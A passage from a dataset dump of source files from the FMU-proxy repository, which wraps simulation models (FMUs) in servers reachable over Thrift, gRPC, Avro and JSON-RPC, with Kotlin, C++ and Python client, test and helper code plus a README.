instance->readReal(read, 47);\n }\n\n auto status = instance->terminate();\n cout << \"terminated FMU with status \" << status << endl;\n\n client.close();\n\n } catch (TException& tx) {\n cout << \"ERROR: \" << tx.what() << endl;\n }\n}\n" }, { "alpha_fraction": 0.6932916641235352, "alphanum_fraction": 0.7012507319450378, "avg_line_length": 31.574073791503906, "blob_id": "c34df45d65936b5767260e9fabe8f4dd12d81602", "content_id": "e9be73799c1d1ead0c504e8a28899ada2a873b0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3518, "license_type": "permissive", "max_line_length": 92, "num_lines": 108, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcBouncingCS.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcBouncingCS {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestGrpcBouncingCS::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.stop()\n fmu.close()\n }\n \n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n\n val h = client.modelDescription.modelVariables\n .getByName(\"h\").asRealVariable()\n\n val dt = 1.0/100\n val stop = 100.0\n runInstance(instance, dt, stop, {\n h.read()\n }).also {\n LOG.info(\"Duration: ${it}ms\")\n }\n\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.587202787399292, "alphanum_fraction": 0.5968976616859436, "avg_line_length": 41.97806930541992, "blob_id": "85a2653215e79a098800db5d4e508c0f28d590c3", "content_id": "a1803a0a283e168d103397f05cdd6e3495f166a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9799, "license_type": "permissive", "max_line_length": 118, "num_lines": 228, "path": "/cpp/FMU-proxy/common/ThriftHelper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_THRIFTHELPER_H\n#define FMU_PROXY_THRIFTHELPER_H\n\n#endif //FMU_PROXY_THRIFTHELPER_H\n\n\n#include <cfloat>\n#include <fmilib.h>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace ::fmuproxy::thrift;\n\nnamespace fmuproxy {\n namespace thrift_helper {\n\n Status::type thriftType(fmi2_status_t status) {\n switch (status) {\n case fmi2_status_ok:\n return Status::type::OK_STATUS;\n case fmi2_status_warning:\n return Status::type::WARNING_STATUS;\n case fmi2_status_pending:\n return Status::type::PENDING_STATUS;\n case fmi2_status_discard:\n return Status::type::DISCARD_STATUS;\n case fmi2_status_error:\n return Status::type::ERROR_STATUS;\n case fmi2_status_fatal:\n return Status::type::FATAL_STATUS;\n }\n }\n\n Causality::type thriftType(fmi2_causality_enu_t causality) {\n switch (causality) {\n case fmi2_causality_enu_input:\n return Causality::type::INPUT_CAUSALITY;\n case fmi2_causality_enu_output:\n return Causality::type::OUTPUT_CAUSALITY;\n case fmi2_causality_enu_parameter:\n return Causality::type::PARAMETER_CAUSALITY;\n case fmi2_causality_enu_local:\n return Causality::type::LOCAL_CAUSALITY;\n case fmi2_causality_enu_independent:\n return Causality::type::INDEPENDENT_CAUSALITY;\n case fmi2_causality_enu_calculated_parameter:\n return Causality::type::CALCULATED_PARAMETER_CAUSALITY;\n case fmi2_causality_enu_unknown:\n return Causality::type::LOCAL_CAUSALITY;\n }\n }\n\n Variability::type thriftType(fmi2_variability_enu_t variability) {\n switch (variability) {\n case fmi2_variability_enu_constant:\n return Variability::type::CONSTANT_VARIABILITY;\n case fmi2_variability_enu_continuous:\n return Variability::type::CONTINUOUS_VARIABILITY;\n case fmi2_variability_enu_discrete:\n return Variability::type::DISCRETE_VARIABILITY;\n case fmi2_variability_enu_fixed:\n return Variability::type::FIXED_VARIABILITY;;\n case fmi2_variability_enu_unknown:\n return Variability::type::CONTINUOUS_VARIABILITY;\n }\n }\n\n Initial::type thriftType(fmi2_initial_enu_t initial) {\n switch (initial) {\n case fmi2_initial_enu_approx:\n return Initial::type::APPROX_INITIAL;\n case fmi2_initial_enu_calculated:\n return Initial::type::CALCULATED_INITIAL;\n case fmi2_initial_enu_exact:\n return Initial::type::EXACT_INITIAL;\n case fmi2_initial_enu_unknown:\n return Initial::type::APPROX_INITIAL;\n }\n }\n\n IntegerAttribute\n thriftType(fmi2_import_variable_t *variable, fmi2_import_integer_variable_t *integer_variable) {\n IntegerAttribute attribute;\n\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.start = fmi2_import_get_integer_variable_start(integer_variable);\n }\n const auto min = fmi2_import_get_integer_variable_min(integer_variable);\n attribute.__set_min(min);\n\n const auto max = fmi2_import_get_integer_variable_max(integer_variable);\n attribute.__set_max(max);\n\n return attribute;\n }\n\n RealAttribute thriftType(fmi2_import_variable_t *variable, fmi2_import_real_variable_t *real_variable) {\n RealAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_real_variable_start(real_variable));\n }\n fmi2_real_t min = fmi2_import_get_real_variable_min(real_variable);\n if (min != -DBL_MAX) {\n attribute.__set_min(min);\n }\n fmi2_real_t max = fmi2_import_get_real_variable_max(real_variable);\n if (max != DBL_MAX) {\n attribute.__set_max(max);\n }\n return attribute;\n }\n\n StringAttribute thriftType(fmi2_import_variable_t *variable, fmi2_import_string_variable_t *string_variable) {\n StringAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_string_variable_start(string_variable));\n }\n return attribute;\n }\n\n BooleanAttribute thriftType(fmi2_import_variable_t *variable, fmi2_import_bool_variable_t *bool_variable) {\n BooleanAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_boolean_variable_start(bool_variable));\n }\n return attribute;\n }\n\n\n void get_scalar_variable(fmi2_import_variable_t *v, ScalarVariable &var) {\n\n var.__set_name(fmi2_import_get_variable_name(v));\n var.__set_valueReference(fmi2_import_get_variable_vr(v));\n\n const char *description = fmi2_import_get_variable_description(v);\n if (description != nullptr) {\n var.__set_description(description);\n }\n\n var.__set_causality(thriftType(fmi2_import_get_causality(v)));\n var.__set_variability(thriftType(fmi2_import_get_variability(v)));\n var.__set_initial(thriftType(fmi2_import_get_initial(v)));\n\n fmi2_base_type_enu_t type = fmi2_import_get_variable_base_type(v);\n switch (type) {\n case fmi2_base_type_int:\n var.attribute.__set_integerAttribute(thriftType(v, fmi2_import_get_variable_as_integer(v)));\n break;\n case fmi2_base_type_real:\n var.attribute.__set_realAttribute(thriftType(v, fmi2_import_get_variable_as_real(v)));\n break;\n case fmi2_base_type_str:\n var.attribute.__set_stringAttribute(thriftType(v, fmi2_import_get_variable_as_string(v)));\n break;\n case fmi2_base_type_bool:\n var.attribute.__set_booleanAttribute(thriftType(v, fmi2_import_get_variable_as_boolean(v)));\n break;\n }\n\n }\n\n void get_model_variables(fmi2_import_t *xml, ModelVariables &modelVariables) {\n\n const auto list = fmi2_import_get_variable_list(xml, 0);\n unsigned int size = fmi2_import_get_variable_list_size(list);\n\n for (unsigned int i = 0; i < size; ++i) {\n fmi2_import_variable_t *v = fmi2_import_get_variable(list, i);\n ScalarVariable var;\n get_scalar_variable(v, var);\n modelVariables.push_back(var);\n }\n\n fmi2_import_free_variable_list(list);\n\n }\n\n void get_model_description(fmi_version_enu_t fmi_version, fmi2_import_t *xml, ModelDescription &md) {\n\n md.__set_guid(fmi2_import_get_GUID(xml));\n md.__set_version(fmi2_import_get_model_standard_version(xml));\n md.__set_fmiVersion(fmi_version_to_string(fmi_version));\n md.__set_modelName(fmi2_import_get_model_name(xml));\n md.__set_author(fmi2_import_get_author(xml));\n md.__set_copyright(fmi2_import_get_copyright(xml));\n md.__set_description(fmi2_import_get_description(xml));\n md.__set_generationTool(fmi2_import_get_generation_tool(xml));\n md.__set_generationDateAndTime(fmi2_import_get_generation_date_and_time(xml));\n md.__set_license(fmi2_import_get_license(xml));\n\n DefaultExperiment ex;\n ex.startTime = fmi2_import_get_default_experiment_start(xml);\n ex.stopTime = fmi2_import_get_default_experiment_stop(xml);\n ex.tolerance = fmi2_import_get_default_experiment_tolerance(xml);\n ex.stepSize = fmi2_import_get_default_experiment_step(xml);\n md.__set_defaultExperiment(ex);\n\n ModelVariables modelVariables;\n get_model_variables(xml, modelVariables);\n md.__set_modelVariables(modelVariables);\n\n }\n\n }\n}\n" }, { "alpha_fraction": 0.6093928813934326, "alphanum_fraction": 0.6254295706748962, "avg_line_length": 23.828571319580078, "blob_id": "18d05c9a29a265646ab7b3a457542c554955d37f", "content_id": "3921afdff734e1e6a19881dfd1a60c700e26ec45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 873, "license_type": "permissive", "max_line_length": 79, "num_lines": 35, "path": "/python/grpc-client/test.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nimport time\nimport client\n\nclient = client.FmuClient(\"localhost\", 8000)\n\nmodel_name = client.model_description.model_name\nprint(\"ModelName={}\".format(model_name))\n\nfmu = client.create_instance()\n\nvariables = fmu.model_variables\nfor key in variables:\n v = variables[key]\n if v.causality == 2:\n print(v)\n\nif fmu.init():\n\n dt = 1.0/100\n start = time.time()\n t = fmu.get_current_time()\n while t < 10:\n step = fmu.step(dt)\n t = step.simulation_time\n if step.status != 0:\n print(\"Error: t={}, FMU returned status {}\".format(t, step.status))\n break\n end = time.time()\n\n print(\"Elapsed={}s\".format(end-start))\n\n reader = fmu.get_reader(\"PistonDisplacement\")\n print(\"PistonDisplacement={}\".format(reader.read_real().value))\n\nprint(\"Terminated with success: {}\".format(fmu.terminate().status == 0))\n\n\n\n" }, { "alpha_fraction": 0.6776803731918335, "alphanum_fraction": 0.6795347332954407, "avg_line_length": 35.368099212646484, "blob_id": "c08de542befff86627c4e05337f04509dc66f122", "content_id": "171a4aff7ee4740342c484bb031ea95944fe02bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5932, "license_type": "permissive", "max_line_length": 225, "num_lines": 163, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/cli/CommandLineParser.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.cli\n\nimport info.laht.yajrpc.RpcHandler\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.FmuProxy\nimport no.mechatronics.sfi.fmuproxy.FmuProxyBuilder\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonHttpServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonTcpServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonWsServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonZmqServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.net.SimpleSocketAddress\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport picocli.CommandLine\nimport java.io.File\nimport java.net.MalformedURLException\nimport java.net.URL\nimport java.util.concurrent.Callable\n\nval LOG: Logger = LoggerFactory.getLogger(CommandLineParser::class.java)\n\nobject CommandLineParser {\n\n fun parse(args: Array<String>): FmuProxy? {\n return CommandLine.call(Args(), System.out, *args)\n }\n\n}\n\n\ninternal class SimpleSocketAddressConverter: CommandLine.ITypeConverter<SimpleSocketAddress> {\n override fun convert(value: String): SimpleSocketAddress {\n return SimpleSocketAddress.parse(value)\n }\n}\n\n\[email protected](name = \"fmu-proxy\")\nclass Args: Callable<FmuProxy> {\n\n @CommandLine.Option(names = [\"-h\", \"--help\"], description = [\"Print this message and quits.\"], usageHelp = true)\n var showHelp = false\n\n @CommandLine.Option(names = [\"-fmu\", \"--fmuPath\"], description = [\"Path to the FMU.\"], required = true)\n lateinit var fmuPath: String\n\n @CommandLine.Option(names = [\"-r\", \"--remote\"], description = [\"Specify an address for the remote tracking server (optional).\"], converter = [SimpleSocketAddressConverter::class])\n var remote: SimpleSocketAddress? = null\n\n @CommandLine.Option(names = [\"-grpc\"], description = [\"Manually specify the gRPC port (optional).\"])\n var grpcPort: Int? = null\n\n @CommandLine.Option(names = [\"-thrift\"], description = [\"Manually specify the Thrift port (optional).\"])\n var thriftPort: Int? = null\n\n @CommandLine.Option(names = [\"-avro\"], description = [\"Manually specify the Avro port (optional).\"])\n var avroPort: Int? = null\n\n @CommandLine.Option(names = [\"-jsonrpc/http\"], description = [\"Manually specify the JSON-RPC HTTP port (optional).\"])\n var jsonHttpPort: Int? = null\n\n @CommandLine.Option(names = [\"-jsonrpc/ws\"], description = [\"Manually specify the JSON-RPC WS port (optional).\"])\n var jsonWsPort: Int? = null\n\n @CommandLine.Option(names = [\"-jsonrpc/tcp\"], description = [\"Manually specify the JSON-RPC TCP/IP port (optional).\"])\n var jsonTcpPort: Int? = null\n\n @CommandLine.Option(names = [\"-jsonrpc/zmq\"], description = [\"Manually specify the JSON-RPC ZMQ port (optional).\"])\n var jsonZmqPort: Int? = null\n\n\n override fun call(): FmuProxy? {\n\n LOG.debug(\"FmuPath=$fmuPath\")\n\n val fmu = File(fmuPath).let {file ->\n\n if (file.exists()) {\n Fmu.from(file)\n } else {\n try {\n val url = URL(fmuPath)\n Fmu.from(url)\n } catch (ex: MalformedURLException) {\n LOG.error(\"Interpreted fmuPath as an URL, but an MalformedURLException was thrown\", ex)\n null\n }\n }\n\n }\n\n fmu ?: return null\n\n return FmuProxyBuilder(fmu).apply {\n\n setRemote(remote)\n\n GrpcFmuServer(fmu).apply {\n addServer(this, grpcPort)\n }\n\n ThriftFmuServer(fmu).apply {\n addServer(this, thriftPort)\n }\n\n AvroFmuServer(fmu).apply {\n addServer(this, avroPort)\n }\n\n val handler = RpcHandler(RpcFmuService(fmu))\n FmuProxyJsonHttpServer(handler).apply {\n addServer(this, jsonHttpPort)\n }\n\n FmuProxyJsonWsServer(handler).apply {\n addServer(this, jsonWsPort)\n }\n\n FmuProxyJsonTcpServer(handler).apply {\n addServer(this, jsonTcpPort)\n }\n\n FmuProxyJsonZmqServer(handler).apply {\n addServer(this, jsonZmqPort)\n }\n\n }.build()\n }\n\n override fun toString(): String {\n return \"Args(fmuPath='$fmuPath', remote=$remote, grpcPort=$grpcPort, thriftPort=$thriftPort, avroPort=$avroPort, jsonHttpPort=$jsonHttpPort, jsonWsPort=$jsonWsPort, jsonTcpPort=$jsonTcpPort, jsonZmqPort=$jsonZmqPort)\"\n }\n\n\n}\n\n\n\n\n" }, { "alpha_fraction": 0.5983431935310364, "alphanum_fraction": 0.6016567945480347, "avg_line_length": 29.39568328857422, "blob_id": "d8123ddca0ee0a529485f95c6bb61f7fcf0edb09", "content_id": "ca91bacc777cd7bcc96ac3caafd4fc2ac2c32559", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4225, "license_type": "permissive", "max_line_length": 87, "num_lines": 139, "path": "/cpp/FMU-proxy/client/ThriftClient.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_THRIFTCLIENT_H\n#define FMU_PROXY_THRIFTCLIENT_H\n\n\n#include <thrift/transport/TSocket.h>\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include \"../common/thrift-gen/FmuService.h\"\n\nusing namespace apache::thrift;\nusing namespace fmuproxy::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nnamespace fmuproxy {\n namespace client {\n\n class RemoteFmuInstance {\n\n private:\n FmuId fmu_id;\n double current_time;\n std::shared_ptr<FmuServiceClient> client;\n\n public:\n RemoteFmuInstance(FmuId fmu_id, std::shared_ptr<FmuServiceClient> client) {\n this->fmu_id = fmu_id;\n this->client = client;\n\n current_time = client->getCurrentTime(fmu_id);\n\n }\n\n double getCurrentTime() {\n return current_time;\n }\n\n Status::type init() {\n return init(0.0, 0.0);\n }\n\n Status::type init(double start) {\n return init(start, 0.0);\n }\n\n Status::type init(double start, double stop) {\n return client->init(fmu_id, start, stop);\n }\n\n void step(StepResult& result, double step_size) {\n client->step(result, fmu_id, step_size);\n current_time = result.simulationTime;\n }\n\n Status::type terminate() {\n return client->terminate(fmu_id);\n }\n\n Status::type reset() {\n return client->reset(fmu_id);\n }\n\n void readInteger(IntegerRead& read, ValueReference vr) {\n return client->readInteger(read, fmu_id, vr);\n }\n\n void readReal(RealRead &read, ValueReference vr) {\n return client->readReal(read, fmu_id, vr);\n }\n\n void readString(StringRead &read, ValueReference vr) {\n return client->readString(read, fmu_id, vr);\n }\n\n void readBoolean(BooleanRead &read, ValueReference vr) {\n return client->readBoolean(read, fmu_id, vr);\n }\n\n ~RemoteFmuInstance() {\n std::cout << \"RemoteFmuInstance destructor called\" << std::endl;\n }\n\n };\n\n class ThriftClient {\n\n private:\n\n std::shared_ptr<TTransport> transport;\n std::shared_ptr<FmuServiceClient> client;\n\n std::shared_ptr<ModelDescription> modelDescription;\n\n public:\n ThriftClient(const char* host, int port);\n\n std::shared_ptr<ModelDescription> getModelDescription();\n\n std::shared_ptr<RemoteFmuInstance> newInstance();\n\n void close() {\n transport->close();\n }\n\n ~ThriftClient() {\n std::cout << \"ThriftClient destructor called\" << std::endl;\n }\n\n };\n\n }\n}\n\n#endif //FMU_PROXY_THRIFTCLIENT_H\n" }, { "alpha_fraction": 0.715708315372467, "alphanum_fraction": 0.7160295248031616, "avg_line_length": 74.8780517578125, "blob_id": "17af5e0a9b3c7518e1cfad22f662bd91bfac0485", "content_id": "c1977f70f53040a2eb6d09a61dad05422d6f4108", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3113, "license_type": "permissive", "max_line_length": 829, "num_lines": 41, "path": "/README.md", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "## FMU-proxy\n\nThe main goal of the Functional Mock-up Interface (FMI) statndard is to allow simulation models to be shared across tools. To accomplish this, FMI relies on a combination of XML-files and compiled C-code packaged in a zip archive. This archive is called an Functional Mock-up Unit (FMU) and uses the extension .fmu. In theory, an FMU can support multiple platforms, however this is not always the case and depends on the type of binaries the exporting tool was able to provide. Furthermore, a library providing FMI support may not be available in a particular language or platform, and/or it may not support the whole standard. Another issue is related to the protection of Intellectual Property (IP). While an FMU is free to only provide the C-code in its binary form, other resources shipped with the FMU may be unprotected. \n\nIn order to overcome these challenges, this paper presents an open-source framework for working with functional mock-up units across languages and platforms. By wrapping a single FMU inside a server program supporting multiple language independent Remote Procedure Calls (RPC) protocols over several network transports. Currently, Apache Thrift (TCP/IP), Apache Avro (TCP/IP), gRPC (HTTP/2) and JSON-RPC (HTTP, WebSockets, TPC/IP, ZMQ) are supported. Together, they allow FMUs to be invoked from virtually any language on any platform.\nAs users don't have direct access to the FMU or the resources within it, IP is effectively protected. \n\n\n### Generating the server from an FMU\n\n```\nUsage: fmu-proxy-gen [-h] -fmu=<fmuPath> [-out=<out>]\n -fmu, --fmuPath=<fmuPath>\n Path to the fmu.\n -h, --help Prints this message and quits.\n -out, --output=<out> Specify where to copy the generated .jar (optional)\n```\n\nThis will create a self-executable JAR named \"myfmu.jar\"\n\n```\nUsage: fmu-proxy [-h] [-avro=<avroPort>] [-grpc=<grpcPort>]\n [-jsonrpc/http=<jsonHttpPort>] [-jsonrpc/tcp=<jsonTcpPort>]\n [-jsonrpc/ws=<jsonWsPort>] [-jsonrpc/zmq=<jsonZmqPort>]\n [-r=<remote>] [-thrift=<thriftPort>]\n -h, --help Print this message and quits.\n -r, --remote=<remote> Specify an address for the remote tracking server (optional).\n -avro=<avroPort> Manually specify the Avro port (optional).\n -grpc=<grpcPort> Manually specify the gRPC port (optional).\n -thrift=<thriftPort> Manually specify the Thrift port (optional).\n -jsonrpc/http=<jsonHttpPort> Manually specify the JSON-RPC HTTP port(optional).\n -jsonrpc/tcp=<jsonTcpPort> Manually specify the JSON-RPC TCP/IP port (optional).\n -jsonrpc/ws=<jsonWsPort> Manually specify the JSON-RPC WS port (optional).\n -jsonrpc/zmq=<jsonZmqPort> Manually specify the JSON-RPC ZMQ port (optional).\n```\n\nYou can now connect to the FMU in your language of choosing using one of the schemas available from the web server or located [here](rpc-definitions) . \n\n## Software architecture\n\n![Software architecture](http://folk.ntnu.no/laht/files/figures/fmu-proxy.PNG)\n\n\n" }, { "alpha_fraction": 0.7041139006614685, "alphanum_fraction": 0.7072784900665283, "avg_line_length": 27.772727966308594, "blob_id": "fdfb6f9a36c129dd2ad850c24b3944ed1f07e250", "content_id": "28e3e0b8ce3115c93b0190ca4b53b9c7db4d3756", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 632, "license_type": "permissive", "max_line_length": 118, "num_lines": 22, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/util.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport org.junit.jupiter.api.Assertions\nimport kotlin.system.measureTimeMillis\n\n\ninternal inline fun runInstance(instance: FmiSimulation, dt: Double, stop: Double, callback: () -> Unit = {}) : Long {\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n return measureTimeMillis {\n while (instance.currentTime < stop) {\n val status = instance.doStep(dt)\n Assertions.assertTrue(status)\n callback()\n }\n }\n\n}" }, { "alpha_fraction": 0.6903026103973389, "alphanum_fraction": 0.6918489336967468, "avg_line_length": 37.85407638549805, "blob_id": "6b256580b68d00edea26002ae34185dad92b54a8", "content_id": "c86c07029864f05078fd9c110ce405c95e81946c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 9054, "license_type": "permissive", "max_line_length": 124, "num_lines": 233, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/services/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 